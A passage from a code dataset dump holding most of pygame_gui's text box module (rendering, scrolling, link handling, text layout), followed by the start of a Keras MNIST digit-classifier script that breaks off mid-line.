self.background_surf = self.drawable_shape.get_surface('normal')\n\n if self.scroll_bar is not None:\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n else:\n height_adjustment = 0\n\n drawable_area = pygame.Rect((0, height_adjustment), (self.text_wrap_rect[2], self.text_wrap_rect[3]))\n self.image = pygame.Surface(self.rect.size, flags=pygame.SRCALPHA)\n self.image.fill(pygame.Color(0, 0, 0, 0))\n self.image.blit(self.background_surf, (0, 0))\n self.image.blit(self.formatted_text_block.block_sprite, (self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset,\n self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n drawable_area)\n\n self.formatted_text_block.add_chunks_to_hover_group(self.link_hover_chunks)\n\n def update(self, time_delta: float):\n \"\"\"\n Called once every update loop of the UI Manager. Used to react to scroll bar movement (if there is one),\n update the text effect (if there is one) and check if we are hovering over any text links (if there are any).\n\n :param time_delta: The time in seconds between calls to update. Useful for timing things.\n \"\"\"\n if self.alive():\n if self.scroll_bar is not None:\n if self.scroll_bar.check_has_moved_recently():\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n drawable_area = pygame.Rect((0, height_adjustment),\n (self.text_wrap_rect[2], self.text_wrap_rect[3]))\n self.image = pygame.Surface(self.rect.size, flags=pygame.SRCALPHA)\n self.image.fill(pygame.Color(0, 0, 0, 0))\n self.image.blit(self.background_surf, (0, 0))\n self.image.blit(self.formatted_text_block.block_sprite, (self.padding[0] + self.border_width +\n self.shadow_width +\n self.rounded_corner_offset,\n self.padding[1] + self.border_width +\n self.shadow_width +\n self.rounded_corner_offset),\n drawable_area)\n\n mouse_x, mouse_y = pygame.mouse.get_pos()\n should_redraw_from_chunks = False\n\n if self.scroll_bar is not None:\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n else:\n height_adjustment = 0\n base_x = (self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset)\n base_y = (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset - height_adjustment)\n\n for chunk in self.link_hover_chunks:\n hovered_currently = False\n\n hover_rect = pygame.Rect((base_x + chunk.rect.x,\n base_y + chunk.rect.y),\n chunk.rect.size)\n if hover_rect.collidepoint(mouse_x, mouse_y):\n if self.rect.collidepoint(mouse_x, mouse_y):\n hovered_currently = True\n if chunk.is_hovered and not hovered_currently:\n chunk.on_unhovered()\n should_redraw_from_chunks = True\n elif hovered_currently and not chunk.is_hovered:\n chunk.on_hovered()\n should_redraw_from_chunks = True\n\n if should_redraw_from_chunks:\n self.redraw_from_chunks()\n\n if self.active_text_effect is not None:\n self.active_text_effect.update(time_delta)\n if self.active_text_effect.should_full_redraw():\n self.full_redraw()\n if self.active_text_effect.should_redraw_from_chunks():\n self.redraw_from_chunks()\n\n def update_containing_rect_position(self):\n \"\"\"\n Sets the final screen position of this element based on the position of it's container and it's relative\n position inside that container.\n \"\"\"\n self.rect = pygame.Rect((self.ui_container.rect.x + self.relative_rect.x,\n 
self.ui_container.rect.y + self.relative_rect.y),\n self.relative_rect.size)\n\n # for chunk in self.link_hover_chunks:\n # chunk.rect = pygame.Rect((self.ui_container.rect.x + self.relative_rect.x + chunk.rect.x,\n # self.ui_container.rect.y + self.relative_rect.y + chunk.rect.y),\n # chunk.rect.size)\n\n def set_relative_position(self, position: Union[pygame.math.Vector2, Tuple[int, int], Tuple[float, float]]):\n self.rect.x = self.ui_container.rect.x + position[0]\n self.rect.y = self.ui_container.rect.y + position[1]\n self.relative_rect.x = position[0]\n self.relative_rect.y = position[1]\n\n if self.scroll_bar is not None:\n scroll_bar_position = (self.relative_rect.right - self.border_width -\n self.shadow_width - self.scroll_bar_width,\n self.relative_rect.top + self.border_width +\n self.shadow_width)\n self.scroll_bar.set_relative_position(scroll_bar_position)\n\n def set_position(self, position: Union[pygame.math.Vector2, Tuple[int, int], Tuple[float, float]]):\n self.rect.x = position[0]\n self.rect.y = position[1]\n self.relative_rect.x = position[0] - self.ui_container.rect.x\n self.relative_rect.y = position[1] - self.ui_container.rect.y\n\n if self.scroll_bar is not None:\n scroll_bar_position = (self.relative_rect.right - self.border_width -\n self.shadow_width - self.scroll_bar_width,\n self.relative_rect.top + self.border_width +\n self.shadow_width)\n self.scroll_bar.set_relative_position(scroll_bar_position)\n\n def set_dimensions(self, dimensions: Union[pygame.math.Vector2, Tuple[int, int], Tuple[float, float]]):\n self.rect.width = dimensions[0]\n self.rect.height = dimensions[1]\n self.relative_rect.width = dimensions[0]\n self.relative_rect.height = dimensions[1]\n\n self.rebuild()\n\n def parse_html_into_style_data(self):\n \"\"\"\n Parses HTML styled string text into a format more useful for styling pygame.font rendered text.\n \"\"\"\n parser = TextHTMLParser(self.ui_theme, self.element_ids, self.object_ids)\n parser.push_style('body', {\"bg_color\": self.background_colour})\n parser.feed(self.html_text)\n\n self.formatted_text_block = TextBlock(parser.text_data,\n self.text_wrap_rect,\n parser.indexed_styles,\n self.font_dict,\n self.link_style,\n self.background_colour,\n self.wrap_to_height\n )\n\n def redraw_from_text_block(self):\n \"\"\"\n Redraws the final parts of the text box element that don't include redrawing the actual text. Useful if we've\n just moved the position of the text (say, with a scroll bar) without actually changing the text itself.\n \"\"\"\n if self.scroll_bar is not None:\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n else:\n height_adjustment = 0\n\n drawable_area = pygame.Rect((0, height_adjustment), (self.text_wrap_rect[2], self.text_wrap_rect[3]))\n self.image = pygame.Surface(self.rect.size, flags=pygame.SRCALPHA)\n self.image.fill(pygame.Color(0, 0, 0, 0))\n self.image.blit(self.background_surf, (0, 0))\n self.image.blit(self.formatted_text_block.block_sprite, (self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset,\n self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n drawable_area)\n\n def redraw_from_chunks(self):\n \"\"\"\n Redraws from slightly earlier in the process than 'redraw_from_text_block'. 
Useful if we have redrawn\n individual chunks already (say, to change their style slightly after being hovered) and now want to update the\n text block with those changes without doing a full redraw.\n\n This won't work very well if redrawing a chunk changed it's dimensions.\n \"\"\"\n self.formatted_text_block.redraw_from_chunks(self.active_text_effect)\n self.redraw_from_text_block()\n\n def full_redraw(self):\n \"\"\"\n Trigger a full redraw of the entire text box. Useful if we have messed with the text chunks in a more\n fundamental fashion and need to reposition them (say, if some of them have gotten wider after being made bold).\n\n NOTE: This doesn't re-parse the text of our box. If you need to do that, just create a new text box.\n\n \"\"\"\n self.formatted_text_block.redraw(self.active_text_effect)\n self.redraw_from_text_block()\n self.link_hover_chunks = []\n self.formatted_text_block.add_chunks_to_hover_group(self.link_hover_chunks)\n\n def select(self):\n \"\"\"\n Called when we focus select the text box (usually by clicking on it). In this case we just pass the focus over\n to the box's scroll bar, if it has one, so that some input events will be directed that way.\n \"\"\"\n if self.scroll_bar is not None:\n self.scroll_bar.select()\n\n def process_event(self, event: pygame.event.Event) -> bool:\n \"\"\"\n Deals with input events. In this case we just handle clicks on any links in the text.\n\n :param event: A pygame event to check for a reaction to.\n :return bool: Returns True if we made use of this event.\n \"\"\"\n processed_event = False\n should_redraw_from_chunks = False\n should_full_redraw = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n mouse_x, mouse_y = event.pos\n if self.rect.collidepoint(mouse_x, mouse_y):\n processed_event = True\n if self.scroll_bar is not None:\n text_block_full_height = self.formatted_text_block.final_dimensions[1]\n height_adjustment = self.scroll_bar.start_percentage * text_block_full_height\n else:\n height_adjustment = 0\n base_x = (self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset)\n base_y = (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset - height_adjustment)\n for chunk in self.link_hover_chunks:\n\n hover_rect = pygame.Rect((base_x + chunk.rect.x,\n base_y + chunk.rect.y),\n chunk.rect.size)\n if hover_rect.collidepoint(mouse_x, mouse_y):\n processed_event = True\n if not chunk.is_selected:\n chunk.on_selected()\n if chunk.metrics_changed_after_redraw:\n should_full_redraw = True\n else:\n should_redraw_from_chunks = True\n\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n if self.scroll_bar is not None:\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n else:\n height_adjustment = 0\n base_x = (self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset)\n base_y = (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset - height_adjustment)\n mouse_x, mouse_y = event.pos\n for chunk in self.link_hover_chunks:\n\n hover_rect = pygame.Rect((base_x + chunk.rect.x,\n base_y + chunk.rect.y),\n chunk.rect.size)\n if hover_rect.collidepoint(mouse_x, mouse_y):\n if self.rect.collidepoint(mouse_x, mouse_y):\n processed_event = True\n if chunk.is_selected:\n link_clicked_event = pygame.event.Event(pygame.USEREVENT,\n {'user_type': 
'ui_text_box_link_clicked',\n                                                                 'link_target': chunk.link_href,\n                                                                 'ui_element': self,\n                                                                 'ui_object_id': self.object_ids[-1]})\n                            pygame.event.post(link_clicked_event)\n\n                    if chunk.is_selected:\n                        chunk.on_unselected()\n                        if chunk.metrics_changed_after_redraw:\n                            should_full_redraw = True\n                        else:\n                            should_redraw_from_chunks = True\n\n        if should_redraw_from_chunks:\n            self.redraw_from_chunks()\n\n        if should_full_redraw:\n            self.full_redraw()\n\n        return processed_event\n\n    def set_active_effect(self, effect_name: Union[str, None]):\n        \"\"\"\n        Set an animation effect to run on the text box. The effect will start running immediately after this call.\n\n        These effects are currently supported:\n\n        - 'typing_appear' - Will look as if the text is being typed in.\n        - 'fade_in' - The text will fade in from the background colour (only supported on Pygame 2)\n        - 'fade_out' - The text will fade out to the background colour (only supported on Pygame 2)\n\n        :param effect_name: The name of the effect to set. If set to None instead it will cancel any active effect.\n        \"\"\"\n        if effect_name is None:\n            self.active_text_effect = None\n        elif type(effect_name) is str:\n            if effect_name == 'typing_appear':\n                effect = TypingAppearEffect(self.formatted_text_block.characters)\n                self.active_text_effect = effect\n                self.full_redraw()\n            elif effect_name == 'fade_in':\n                effect = FadeInEffect(self.formatted_text_block.characters)\n                self.active_text_effect = effect\n                self.redraw_from_chunks()\n            elif effect_name == 'fade_out':\n                effect = FadeOutEffect(self.formatted_text_block.characters)\n                self.active_text_effect = effect\n                self.redraw_from_chunks()\n            else:\n                warnings.warn('Unsupported effect name: ' + effect_name + ' for text box')\n\n    def rebuild_from_changed_theme_data(self):\n        \"\"\"\n        Called by the UIManager to check the theming data and rebuild whatever needs rebuilding for this element when\n        the theme data has changed.\n        \"\"\"\n        has_any_changed = False\n\n        # misc parameters\n        shape_type = 'rectangle'\n        shape_type_string = self.ui_theme.get_misc_data(self.object_ids, self.element_ids, 'shape')\n        if shape_type_string is not None:\n            if shape_type_string in ['rectangle', 'rounded_rectangle']:\n                shape_type = shape_type_string\n        if shape_type != self.shape_type:\n            self.shape_type = shape_type\n            has_any_changed = True\n\n        corner_radius = 2\n        shape_corner_radius_string = self.ui_theme.get_misc_data(self.object_ids,\n                                                                 self.element_ids, 'shape_corner_radius')\n        if shape_corner_radius_string is not None:\n            try:\n                corner_radius = int(shape_corner_radius_string)\n            except ValueError:\n                corner_radius = 2\n        if corner_radius != self.shape_corner_radius:\n            self.shape_corner_radius = corner_radius\n            has_any_changed = True\n\n        border_width = 0\n        border_width_string = self.ui_theme.get_misc_data(self.object_ids, self.element_ids, 'border_width')\n        if border_width_string is not None:\n            try:\n                border_width = int(border_width_string)\n            except ValueError:\n                border_width = 0\n\n        if border_width != self.border_width:\n            self.border_width = border_width\n            has_any_changed = True\n\n        shadow_width = 0\n        shadow_width_string = self.ui_theme.get_misc_data(self.object_ids, self.element_ids, 'shadow_width')\n        if shadow_width_string is not None:\n            try:\n                shadow_width = int(shadow_width_string)\n            except ValueError:\n                shadow_width = 0\n        if shadow_width != self.shadow_width:\n            self.shadow_width = shadow_width\n            has_any_changed = True\n\n        padding = (10, 10)\n        padding_str = self.ui_theme.get_misc_data(self.object_ids, self.element_ids, 'padding')\n        if padding_str is 
not None:\n try:\n padding = (int(padding_str.split(',')[0]), int(padding_str.split(',')[1]))\n except ValueError:\n padding = (10, 10)\n if padding != self.padding:\n self.padding = padding\n has_any_changed = True\n\n # colour parameters\n background_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'dark_bg')\n if background_colour != self.background_colour:\n self.background_colour = background_colour\n has_any_changed = True\n\n border_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'normal_border')\n if border_colour != self.border_colour:\n self.border_colour = border_colour\n has_any_changed = True\n\n # link styles\n link_normal_underline = True\n link_normal_underline_string = self.ui_theme.get_misc_data(self.object_ids,\n self.element_ids, 'link_normal_underline')\n if link_normal_underline_string is not None:\n try:\n link_normal_underline = bool(int(link_normal_underline_string))\n except ValueError:\n link_normal_underline = True\n if link_normal_underline != self.link_normal_underline:\n self.link_normal_underline = link_normal_underline\n\n link_hover_underline = True\n link_hover_underline_string = self.ui_theme.get_misc_data(self.object_ids,\n self.element_ids, 'link_hover_underline')\n if link_hover_underline_string is not None:\n try:\n link_hover_underline = bool(int(link_hover_underline_string))\n except ValueError:\n link_hover_underline = True\n if link_hover_underline != self.link_hover_underline:\n self.link_hover_underline = link_hover_underline\n\n link_normal_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'link_text')\n if link_normal_colour != self.link_normal_colour:\n self.link_normal_colour = link_normal_colour\n\n link_hover_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'link_hover')\n if link_hover_colour != self.link_hover_colour:\n self.link_hover_colour = link_hover_colour\n\n link_selected_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'link_selected')\n if link_selected_colour != self.link_selected_colour:\n self.link_selected_colour = link_selected_colour\n\n link_style = {'link_text': self.link_normal_colour,\n 'link_hover': self.link_hover_colour,\n 'link_selected': self.link_selected_colour,\n 'link_normal_underline': self.link_normal_underline,\n 'link_hover_underline': self.link_hover_underline}\n\n if link_style != self.link_style:\n self.link_style = link_style\n has_any_changed = True\n\n if has_any_changed:\n self.rebuild()\n\n\nclass StyledChunk:\n def __init__(self, font_size, font_name, chunk, style,\n color, bg_color, is_link, link_href, link_style, position: Tuple[int, int], font_dictionary):\n self.style = style\n self.chunk = chunk\n self.font_size = font_size\n self.font_name = font_name\n self.is_link = is_link\n self.link_href = link_href\n self.link_style = link_style\n\n self.font = font_dictionary.find_font(font_size, font_name, self.style.bold, self.style.italic)\n\n if self.is_link:\n self.normal_colour = self.link_style['link_text']\n self.hover_colour = self.link_style['link_hover']\n self.selected_colour = self.link_style['link_selected']\n self.link_normal_underline = self.link_style['link_normal_underline']\n self.link_hover_underline = self.link_style['link_hover_underline']\n else:\n self.normal_colour = color\n self.hover_colour = None\n self.selected_colour = None\n self.link_normal_underline = False\n self.link_hover_underline = False\n\n self.color = 
self.normal_colour\n self.bg_color = bg_color\n self.position = position\n\n self.is_hovered = False\n self.is_selected = False\n\n if self.style.underline or (self.is_hovered and self.link_hover_underline) or\\\n (self.link_normal_underline and not self.is_hovered):\n self.font.set_underline(True)\n\n if len(self.chunk) > 0:\n if type(self.bg_color) == ColourGradient or self.bg_color.a != 255:\n if type(self.color) != ColourGradient:\n self.rendered_chunk = self.font.render(self.chunk, True, self.color)\n else:\n self.rendered_chunk = self.font.render(self.chunk, True, pygame.Color('#FFFFFFFF'))\n self.color.apply_gradient_to_surface(self.rendered_chunk)\n else:\n if type(self.color) != ColourGradient:\n self.rendered_chunk = self.font.render(self.chunk, True, self.color, self.bg_color)\n else:\n self.rendered_chunk = self.font.render(self.chunk, True, pygame.Color('#FFFFFFFF'))\n self.color.apply_gradient_to_surface(self.rendered_chunk)\n else:\n self.rendered_chunk = pygame.Surface((0, 0))\n metrics = self.font.metrics(self.chunk)\n self.ascent = self.font.get_ascent()\n self.width = self.font.size(self.chunk)[0]\n self.height = self.font.size(self.chunk)[1]\n self.advance = 0\n for i in range(0, len(self.chunk)):\n if len(metrics[i]) == 5:\n self.advance += metrics[i][4]\n\n self.rect = pygame.Rect(self.position, (self.width, self.height))\n self.metrics_changed_after_redraw = False\n\n self.unset_underline_style()\n\n def unset_underline_style(self):\n self.font.set_underline(False)\n\n def redraw(self):\n if self.style.underline or (self.is_hovered and self.link_hover_underline) or \\\n (self.link_normal_underline and not self.is_hovered):\n self.font.set_underline(True)\n\n if len(self.chunk) > 0:\n if type(self.bg_color) == ColourGradient or self.bg_color.a != 255:\n if type(self.color) != ColourGradient:\n self.rendered_chunk = self.font.render(self.chunk, True, self.color)\n else:\n self.rendered_chunk = self.font.render(self.chunk, True, pygame.Color('#FFFFFFFF'))\n self.color.apply_gradient_to_surface(self.rendered_chunk)\n else:\n if type(self.color) != ColourGradient:\n self.rendered_chunk = self.font.render(self.chunk, True, self.color, self.bg_color)\n else:\n self.rendered_chunk = self.font.render(self.chunk, True, pygame.Color('#FFFFFFFF'))\n self.color.apply_gradient_to_surface(self.rendered_chunk)\n else:\n self.rendered_chunk = pygame.Surface((0, 0))\n\n self.font.set_underline(False)\n\n new_metrics = self.font.metrics(self.chunk)\n new_ascent = self.font.get_ascent()\n new_width = self.font.size(self.chunk)[0]\n new_height = self.font.size(self.chunk)[1]\n new_advance = 0\n for i in range(0, len(self.chunk)):\n if len(new_metrics[i]) == 5:\n new_advance += new_metrics[i][4]\n\n if (new_ascent != self.ascent or new_width != self.width) or (\n new_height != self.height or new_advance != self.advance):\n self.metrics_changed_after_redraw = True\n self.ascent = new_ascent\n self.width = new_width\n self.height = new_height\n self.advance = new_advance\n self.rect = pygame.Rect(self.position, (self.width, self.height))\n else:\n self.metrics_changed_after_redraw = False\n\n def on_hovered(self):\n if not self.is_selected:\n self.color = self.hover_colour\n self.is_hovered = True\n self.redraw()\n\n def on_unhovered(self):\n if not self.is_selected:\n self.color = self.normal_colour\n self.is_hovered = False\n self.redraw()\n\n def on_selected(self):\n self.color = self.selected_colour\n self.is_selected = True\n self.redraw()\n\n def on_unselected(self):\n self.color = 
self.normal_colour\n self.is_selected = False\n self.redraw()\n\n\nclass TextBlock:\n\n class TextLine:\n def __init__(self):\n self.chunks = []\n self.max_line_char_height = 0\n self.max_line_ascent = 0\n\n def __init__(self, text, rect_or_pos, indexed_styles, font_dict, link_style, bg_colour, wrap_to_height=False):\n self.characters = text\n if len(rect_or_pos) == 2:\n self.position = rect_or_pos\n self.width = -1\n self.height = -1\n else:\n self.position = (rect_or_pos[0], rect_or_pos[1])\n self.width = rect_or_pos[2]\n if wrap_to_height:\n self.height = rect_or_pos[3]\n else:\n self.height = -1\n\n self.indexed_styles = indexed_styles\n self.block_sprite = None\n self.font_dict = font_dict\n\n self.final_dimensions = (rect_or_pos[2], rect_or_pos[3])\n\n self.link_style = link_style\n\n self.bg_colour = bg_colour\n\n self.lines = []\n self.redraw(None)\n\n def redraw(self, text_effect):\n \"\"\"\n Takes our parsed text and the styles generated from that parsing and builds rendered 'chunks' out of them\n that are then blitted onto a final surface containing all our drawn text.\n \"\"\"\n self.lines = []\n if text_effect:\n end_text_position = text_effect.get_end_text_pos()\n else:\n end_text_position = len(self.characters)\n\n lines_of_chunks = []\n chunk_line = []\n start_style_key = 0\n keys = [key for key in list(self.indexed_styles.keys()) if key <= end_text_position]\n keys.append(end_text_position)\n max_line_ascent = 0\n for end_style_key in keys:\n if end_style_key != 0:\n text = self.characters[start_style_key:end_style_key]\n chunk = [text, self.indexed_styles[start_style_key]]\n chunk_font = self.font_dict.find_font(chunk[1].font_size,\n chunk[1].font_name,\n chunk[1].style.bold,\n chunk[1].style.italic)\n chunk_ascent = chunk_font.get_ascent()\n if chunk_ascent > max_line_ascent:\n max_line_ascent = chunk_ascent\n if chunk[0] == '\\n':\n if len(chunk_line) == 0:\n lines_of_chunks.append([max_line_ascent, [['', chunk[1]]]])\n else:\n lines_of_chunks.append([max_line_ascent, chunk_line])\n chunk_line = []\n max_line_ascent = 0\n else:\n chunk_line.append(chunk)\n\n start_style_key = end_style_key\n\n if len(chunk_line) > 0:\n lines_of_chunks.append([max_line_ascent, chunk_line])\n\n if self.width != -1:\n line_index = 0\n while line_index < len(lines_of_chunks):\n line = lines_of_chunks[line_index][1]\n line_render_length = 0\n split_point = -1\n chunk_index = 0\n chunk_to_split_index = 0\n chunk_length = 0\n for chunk in line:\n font = self.font_dict.find_font(chunk[1].font_size,\n chunk[1].font_name,\n chunk[1].style.bold,\n chunk[1].style.italic)\n\n metrics = font.metrics(chunk[0])\n chunk_length = font.size(chunk[0])[0]\n line_render_length += chunk_length\n if line_render_length > self.width:\n char_line_length = line_render_length - chunk_length\n for i in range(0, len(metrics)):\n advance = metrics[i][4]\n char_line_length += advance\n if char_line_length > self.width:\n # splitting time\n chunk_to_split_index = chunk_index\n split_point = i\n break\n if split_point != -1:\n break\n chunk_index += 1\n\n if split_point != -1:\n word_split_point = 0\n chunk_to_split = line[chunk_to_split_index]\n for i in range(split_point, 0, -1):\n if chunk_to_split[0][i] == ' ':\n word_split_point = i\n break\n if word_split_point == 0 and chunk_to_split_index == 0 and chunk_length > self.width:\n # our chunk is one word, at the start of the line, and the split point is in it, so split the\n # word instead of hunting for a word split point\n if split_point > 0:\n chunk_1 = 
[chunk_to_split[0][:split_point-1] + '-', chunk_to_split[1]]\n chunk_2 = [\"-\" + chunk_to_split[0][split_point-1:].lstrip(' '), chunk_to_split[1]]\n\n chunk_2_font = self.font_dict.find_font(chunk_2[1].font_size,\n chunk_2[1].font_name,\n chunk_2[1].style.bold,\n chunk_2[1].style.italic)\n chunk_2_ascent = chunk_2_font.get_ascent()\n\n lines_of_chunks[line_index][1][chunk_to_split_index] = chunk_1\n new_line = [chunk_2_ascent, [chunk_2]]\n\n chunk_length_of_line = len(lines_of_chunks[line_index][1])\n for remaining_chunk_index in range(chunk_to_split_index + 1, chunk_length_of_line):\n remaining_chunk = lines_of_chunks[line_index][1][remaining_chunk_index]\n new_line[1].append(remaining_chunk)\n\n remaining_chunk_font = self.font_dict.find_font(remaining_chunk[1].font_size,\n remaining_chunk[1].font_name,\n remaining_chunk[1].style.bold,\n remaining_chunk[1].style.italic)\n remaining_chunk_ascent = remaining_chunk_font.get_ascent()\n if remaining_chunk_ascent > new_line[0]:\n new_line[0] = remaining_chunk_ascent\n\n for remaining_chunk_index in range(chunk_to_split_index + 1, chunk_length_of_line):\n lines_of_chunks[line_index][1].pop()\n\n lines_of_chunks.insert(line_index + 1, new_line)\n\n else:\n chunk_1 = [chunk_to_split[0][:word_split_point], chunk_to_split[1]]\n chunk_2 = [chunk_to_split[0][word_split_point:].lstrip(' '), chunk_to_split[1]]\n\n chunk_2_font = self.font_dict.find_font(chunk_2[1].font_size,\n chunk_2[1].font_name,\n chunk_2[1].style.bold,\n chunk_2[1].style.italic)\n chunk_2_ascent = chunk_2_font.get_ascent()\n\n lines_of_chunks[line_index][1][chunk_to_split_index] = chunk_1\n new_line = [chunk_2_ascent, [chunk_2]]\n\n chunk_length_of_line = len(lines_of_chunks[line_index][1])\n for remaining_chunk_index in range(chunk_to_split_index + 1, chunk_length_of_line):\n remaining_chunk = lines_of_chunks[line_index][1][remaining_chunk_index]\n new_line[1].append(remaining_chunk)\n\n remaining_chunk_font = self.font_dict.find_font(remaining_chunk[1].font_size,\n remaining_chunk[1].font_name,\n remaining_chunk[1].style.bold,\n remaining_chunk[1].style.italic)\n remaining_chunk_ascent = remaining_chunk_font.get_ascent()\n if remaining_chunk_ascent > new_line[0]:\n new_line[0] = remaining_chunk_ascent\n\n for remaining_chunk_index in range(chunk_to_split_index + 1, chunk_length_of_line):\n lines_of_chunks[line_index][1].pop()\n\n lines_of_chunks.insert(line_index+1, new_line)\n line_index += 1\n\n surface = None\n surface_width = self.width\n surface_height = self.height\n if self.height != -1 and self.width != -1:\n surface = pygame.Surface((self.width, self.height), pygame.SRCALPHA)\n\n position = [0, 0]\n line_height_acc = 0\n max_line_length = 0\n for line in lines_of_chunks:\n line_chunks = []\n max_line_char_height = 0\n max_line_ascent = 0\n for chunk in line[1]:\n new_chunk = StyledChunk(chunk[1].font_size,\n chunk[1].font_name,\n chunk[0],\n chunk[1].style,\n chunk[1].color,\n chunk[1].bg_color,\n chunk[1].is_link,\n chunk[1].link_href,\n self.link_style,\n (position[0], position[1]),\n self.font_dict)\n position[0] += new_chunk.advance\n if new_chunk.height > max_line_char_height:\n max_line_char_height = new_chunk.height\n if new_chunk.ascent > max_line_ascent:\n max_line_ascent = new_chunk.ascent\n line_chunks.append(new_chunk)\n\n if surface is not None:\n # need to adjust y start pos based on ascents\n chunk_rect = new_chunk.rect\n adjust = line[0] - new_chunk.ascent\n chunk_rect.y += adjust\n surface.blit(new_chunk.rendered_chunk, chunk_rect)\n\n text_line = 
TextBlock.TextLine()\n text_line.chunks = line_chunks\n text_line.max_line_ascent = max_line_ascent\n self.lines.append(text_line)\n\n position[0] = 0\n position[1] += max_line_char_height\n line_height_acc += max_line_char_height\n\n if surface is None:\n if self.width == -1:\n surface_width = max_line_length\n else:\n surface_width = self.width\n if self.height == -1:\n surface_height = line_height_acc\n else:\n surface_height = self.height\n\n surface = pygame.Surface((surface_width, surface_height), pygame.SRCALPHA)\n\n for line in self.lines:\n for chunk in line.chunks:\n # need to adjust y start pos based on ascents\n chunk_rect = chunk.rect\n adjust = line.max_line_ascent - chunk.ascent\n chunk_rect.y += adjust\n surface.blit(chunk.rendered_chunk, chunk_rect)\n\n self.block_sprite = surface\n self.final_dimensions = [surface_width, surface_height]\n self.width = surface_width\n self.height = surface_height\n\n def redraw_from_chunks(self, text_effect):\n if text_effect:\n final_alpha = text_effect.get_final_alpha()\n else:\n final_alpha = 255\n\n self.block_sprite = pygame.Surface((self.width, self.height), flags=pygame.SRCALPHA)\n\n if type(self.bg_colour) == ColourGradient:\n self.block_sprite.fill(pygame.Color(\"#FFFFFFFF\"))\n self.bg_colour.apply_gradient_to_surface(self.block_sprite)\n else:\n self.block_sprite.fill(self.bg_colour)\n\n for text_line in self.lines:\n for chunk in text_line.chunks:\n if self.block_sprite is not None:\n if final_alpha != 255:\n self.block_sprite.blit(chunk.rendered_chunk, chunk.rect)\n else:\n self.block_sprite.blit(chunk.rendered_chunk, chunk.rect)\n self.block_sprite.set_alpha(final_alpha)\n\n def add_chunks_to_hover_group(self, hover_group):\n for line in self.lines:\n for chunk in line.chunks:\n if chunk.is_link:\n hover_group.append(chunk)\n\n def draw(self, surface):\n surface.blit(self.block_sprite, self.position)\n","sub_path":"pygame_gui/elements/ui_text_box.py","file_name":"ui_text_box.py","file_ext":"py","file_size_in_byte":51074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"93035835","text":"from tensorflow import keras\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, Activation, BatchNormalization, AveragePooling2D\nfrom tensorflow.keras.optimizers import SGD, RMSprop, Adam\nfrom PIL import Image\nimport time\nimport tensorflow as tf\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom sklearn.metrics import confusion_matrix\nimport itertools\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\nimport pandas as pd\n\n\n\ndef prRes(str1):\n list_of_files = os.listdir(str1)\n for file in list_of_files:\n image_file_name = os.path.join(str1, file)\n if \".jpg\" in image_file_name:\n print(\"Правильный ответ:\" +str(image_file_name.split(\"content/\")[1].split(\"/\")[1].split(\".\")[0])+ \"--- Полученный ответ: \" + str(mlp_digits_predict(model, image_file_name)))\n \ndef load_images_to_data(image_label, image_directory, features_data, label_data):\n list_of_files = os.listdir(image_directory)\n for file in list_of_files:\n image_file_name = os.path.join(image_directory, file)\n if \".png\" in image_file_name:\n img = Image.open(image_file_name).convert(\"L\")\n img = np.resize(img, (28,28,1))\n im2arr = np.array(img)\n im2arr = im2arr.reshape(1, 28, 28, 1)\n features_data = np.append(features_data, im2arr, axis=0)\n label_data = np.append(label_data, [image_label], axis=0)\n 
return features_data, label_data\n\ndef mlp_digits_predict(model, image_file):\n img = keras.preprocessing.image.load_img(image_file, target_size=(28, 28), color_mode='grayscale')\n img_arr = np.expand_dims(img, axis=0)\n img_arr = 1 - img_arr/255.0\n img_arr = img_arr.reshape((1, 28, 28, 1))\n result = model.predict_classes([img_arr])\n return result[0]\n\ndef mnist_make_model(image_w: int, image_h: int): \n num_classes = 10 \n model = Sequential()\n model.add(Conv2D(filters=32, kernel_size=(3,3), activation='relu',padding='same',\n input_shape=(28, 28, 1)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu',padding='same'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu',padding='same'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Flatten())\n # Densely connected layers\n model.add(Dense(128, activation='relu'))\n # Output layer\n model.add(Dense(num_classes, activation='softmax'))\n model.compile(optimizer=Adam(), loss='categorical_crossentropy',metrics=['accuracy'])\n return model\n\ndef mnist_mlp_train(model):\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n x_train = np.reshape(x_train,(x_train.shape[0], 28, 28, 1)).astype('float32')/255.0\n x_test = np.reshape(x_test,(x_test.shape[0], 28, 28, 1)).astype('float32')/255.0\n y_train = keras.utils.to_categorical(y_train, 10)\n y_test = 